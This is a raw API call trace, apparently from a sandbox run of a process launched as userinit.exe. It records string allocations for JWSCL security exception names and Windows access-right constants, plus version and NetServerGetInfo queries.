[0130.048] SysReAllocStringLen (in: pbstr=0x28ff6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x28ff6d8*="EJwsclNilPointer") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x28ff6c0*="EJwsclUnimplemented") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x28ff6a8*="EJwsclInitWellKnownException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x28ff690*="EJwsclKeyApiException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x28ff678*="EJwsclKeyException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x28ff660*="EJwsclHashApiException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x28ff648*="EJwsclHashException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x28ff630*="EJwsclCSPApiException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x28ff618*="EJwsclCSPException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x28ff600*="EJwsclTerminalSessionException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x28ff5e8*="EJwsclTerminalServiceNecessary") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x28ff5d0*="EJwsclTerminalServiceException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x28ff5b8*="EJwsclTerminalServerConnectException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x28ff5a0*="EJwsclTerminalServerException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x28ff588*="EJwsclCryptUnsupportedException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x28ff570*="EJwsclCryptApiException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x28ff558*="EJwsclCryptException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x28ff540*="EJwsclOSError") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x28ff528*="EJwsclResourceInitFailed") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x28ff510*="EJwsclResourceUnequalCount") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x28ff4f8*="EJwsclResourceNotFound") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x28ff4e0*="EJwsclResourceException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x28ff4c8*="EJwsclFailedAddACE") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x28ff4b0*="EJwsclUnsupportedACE") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x28ff498*="EJwsclOpenWindowStationException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x28ff480*="EJwsclWindowStationException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x28ff468*="EJwsclCloseDesktopException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x28ff450*="EJwsclCreateDesktopException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x28ff438*="EJwsclOpenDesktopException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x28ff420*="EJwsclDesktopException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x28ff408*="EJwsclSACLAccessDenied") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x28ff3f0*="EJwsclAccessDenied") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x28ff3d8*="EJwsclLSAException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x28ff3c0*="ESetOwnerException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x28ff3a8*="ESetSecurityException") returned 1
[0130.048] SysReAllocStringLen (in: pbstr=0x28ff390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x28ff390*="EJwsclInvalidParentDescriptor") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x28ff378*="EJwsclInvalidKeyPath") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x28ff360*="EJwsclInvalidGenericAccessMask") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x28ff348*="EJwsclAdaptSecurityInfoException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x28ff330*="EJwsclThreadException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x28ff318*="EJwsclInvalidObjectException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x28ff300*="EJwsclSecurityObjectException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x28ff2e8*="EJwsclHashMismatch") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x28ff2d0*="EJwsclStreamHashException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x28ff2b8*="EJwsclStreamInvalidMagicException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x28ff2a0*="EJwsclStreamSizeException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x28ff288*="EJwsclStreamException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x28ff270*="EJwsclNoSuchLogonSession") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x28ff258*="EJwsclInvalidFlagsException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x28ff240*="EJwsclProcessNotFound") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x28ff228*="EJwsclInvalidParameterException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x28ff210*="EJwsclInvalidPathException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x28ff1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x28ff1e0*="EJwsclInvalidRevision") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x28ff1c8*="EJwsclInvalidAceMismatch") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x28ff1b0*="EJwsclRevisionMismatchException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x28ff198*="EJwsclInvalidACEException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x28ff180*="EJwsclReadOnlyPropertyException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x28ff168*="EJwsclDuplicateListEntryException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x28ff150*="EJwsclIndexOutOfBoundsException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x28ff138*="EJwsclInvalidSidAuthorityValue") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x28ff120*="EJwsclInvalidKnownSIDException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x28ff108*="EJwsclInvalidComputer") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x28ff0f0*="EJwsclInvalidGroupSIDException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x28ff0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x28ff0c0*="EJwsclInvalidSIDException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x28ff0a8*="EJwsclInvalidSecurityListException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x28ff090*="EJwsclInvalidMandatoryLevelException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x28ff078*="EJwsclEmptyACLException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x28ff060*="EJwsclNILParameterException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x28ff048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0130.049] SysReAllocStringLen (in: pbstr=0x28ff030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x28ff030*="EJwsclInvalidObjectArrayException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28ff018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x28ff018*="EJwsclProcessIdNotAvailable") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28ff000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x28ff000*="EJwsclWinCallFailedException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fefe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x28fefe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fefd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x28fefd0*="EJwsclNotImplementedException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fefb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x28fefb8*="EJwsclAccessTypeException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fefa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x28fefa0*="EJwsclAdjustPrivilegeException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x28fef88*="EJwsclPrivilegeCheckException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x28fef70*="EJwsclPrivilegeNotFoundException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x28fef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x28fef40*="EJwsclPrivilegeException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x28fef28*="EJwsclNotEnoughMemory") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x28fef10*="EJwsclInvalidTokenHandle") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28feef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x28feef8*="EJwsclNoThreadTokenAvailable") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28feee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x28feee0*="EJwsclDuplicateTokenException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28feec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x28feec8*="EJwsclInvalidOwnerException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28feeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x28feeb0*="EJwsclInvalidPrimaryToken") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x28fee98*="EJwsclTokenPrimaryException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x28fee80*="EJwsclTokenImpersonationException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x28fee68*="EJwsclTokenInformationException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x28fee50*="EJwsclSharedTokenException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x28fee38*="EJwsclOpenProcessTokenException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x28fee20*="EJwsclOpenThreadTokenException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x28fee08*="EJwsclSecurityException") returned 1
[0130.050] SysReAllocStringLen (in: pbstr=0x28fedf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x28fedf0*="Exception") returned 1
[0130.050] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.098] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0130.098] GetVersionExA (in: lpVersionInformation=0x6f814*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x250000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="<ø\x06") | out: lpVersionInformation=0x6f814*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0130.098] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0130.098] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0130.104] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0130.104] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x6f898 | out: bufptr=0x6f898) returned 0x0
[0130.145] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0130.145] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0130.145] NetApiBufferFree (Buffer=0x271d00) returned 0x0
[0130.146] SetErrorMode (uMode=0x8000) returned 0x1
[0130.146] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0130.146] SetErrorMode (uMode=0x1) returned 0x8000
[0130.146] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.148] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.149] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.151] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0130.152] SysReAllocStringLen (in: pbstr=0x28fec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fec40*="DELETE") returned 1
[0130.152] SysReAllocStringLen (in: pbstr=0x28fec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fec30*="READ_CONTROL") returned 1
[0130.152] SysReAllocStringLen (in: pbstr=0x28fec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fec20*="WRITE_OWNER") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fec10*="WRITE_DAC") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x28fec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28febf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x28febf0*="FILE_READ_ATTRIBUTES") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28febe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x28febe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28febd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x28febd0*="FILE_WRITE_DATA") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28febc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x28febc0*="FILE_READ_DATA") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28febb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x28febb0*="FILE_ALL_ACCESS") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28feba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28feb90*="STANDARD_RIGHTS_WRITE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28feb80*="STANDARD_RIGHTS_READ") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28feb70*="STANDARD_RIGHTS_ALL") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28feb50*="DELETE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28feb40*="READ_CONTROL") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28feb30*="WRITE_OWNER") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28feb20*="WRITE_DAC") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x28feb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x28feb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x28feaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x28feae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x28fead0*="TOKEN_QUERY_SOURCE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x28feac0*="TOKEN_QUERY") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x28feab0*="TOKEN_IMPERSONATE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28feaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x28feaa0*="TOKEN_DUPLICATE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x28fea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x28fea80*="TOKEN_ALL_ACCESS") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fea60*="STANDARD_RIGHTS_WRITE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fea50*="STANDARD_RIGHTS_READ") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fea40*="STANDARD_RIGHTS_ALL") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fea30*="DELETE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fea20*="READ_CONTROL") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fea10*="WRITE_OWNER") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fea00*="WRITE_DAC") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fe9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x28fe9f0*="TIMER_MODIFY_STATE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fe9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x28fe9e0*="TIMER_QUERY_STATE") returned 1
[0130.153] SysReAllocStringLen (in: pbstr=0x28fe9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x28fe9d0*="TIMER_ALL_ACCESS") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x28fe9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x28fe9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x28fe9a0*="STANDARD_RIGHTS_READ") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x28fe990*="STANDARD_RIGHTS_ALL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x28fe980*="DELETE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x28fe970*="READ_CONTROL") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x28fe960*="WRITE_OWNER") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x28fe950*="WRITE_DAC") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x28fe940*="SECTION_EXTEND_SIZE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x28fe930*="FILE_MAP_READ") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x28fe920*="FILE_MAP_WRITE") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x28fe910*="FILE_MAP_COPY") returned 1
[0130.154] SysReAllocStringLen (in: pbstr=0x28fe900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x28fe900*="FILE_MAP_ALL_ACCESS") returned 1
